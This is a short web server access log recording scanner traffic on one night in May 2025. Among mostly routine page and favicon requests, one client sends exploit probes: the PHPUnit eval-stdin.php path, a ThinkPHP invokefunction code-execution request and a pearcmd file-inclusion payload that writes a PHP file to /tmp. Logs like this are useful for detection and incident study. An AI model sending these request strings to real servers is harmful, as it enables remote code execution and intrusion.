34.34.185.61 - - [04/May/2025:20:25:17 +0530] "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 255 "-" "Custom-AsyncHttpClient"
34.34.185.61 - - [04/May/2025:20:25:17 +0530] "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 253 "-" "Custom-AsyncHttpClient"
34.34.185.61 - - [04/May/2025:20:25:17 +0530] "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 252 "-" "Custom-AsyncHttpClient"
34.34.185.61 - - [04/May/2025:20:25:18 +0530] "GET /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 200 4270 "-" "Custom-AsyncHttpClient"
34.34.185.61 - - [04/May/2025:20:25:18 +0530] "GET /public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 214 "-" "Custom-AsyncHttpClient"
34.34.185.61 - - [04/May/2025:20:25:18 +0530] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\"hi\"));?>+/tmp/index1.php HTTP/1.1" 200 4270 "-" "Custom-AsyncHttpClient"
34.34.185.61 - - [04/May/2025:20:25:18 +0530] "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 200 4270 "-" "Custom-AsyncHttpClient"
34.34.185.61 - - [04/May/2025:20:25:19 +0530] "GET /containers/json HTTP/1.1" 404 213 "-" "Custom-AsyncHttpClient"
45.79.120.183 - - [04/May/2025:20:27:06 +0530] "\x16\x03\x01" 400 226 "-" "-"
45.79.120.183 - - [04/May/2025:20:27:08 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15"
45.79.120.183 - - [04/May/2025:20:27:21 +0530] "GET /./favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15"
176.65.142.182 - - [04/May/2025:20:27:37 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
212.107.12.18 - - [04/May/2025:20:29:34 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
137.74.181.254 - - [04/May/2025:20:30:08 +0530] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
185.218.86.4 - - [04/May/2025:20:30:32 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.107.12.18 - - [04/May/2025:20:31:23 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
185.218.86.4 - - [04/May/2025:20:31:43 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.242.226.12 - - [04/May/2025:20:42:02 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
185.218.84.178 - - [04/May/2025:20:42:51 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.242.226.12 - - [04/May/2025:20:43:12 +0530] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Python/3.7 aiohttp/3.8.1"
154.81.156.34 - - [04/May/2025:20:43:14 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
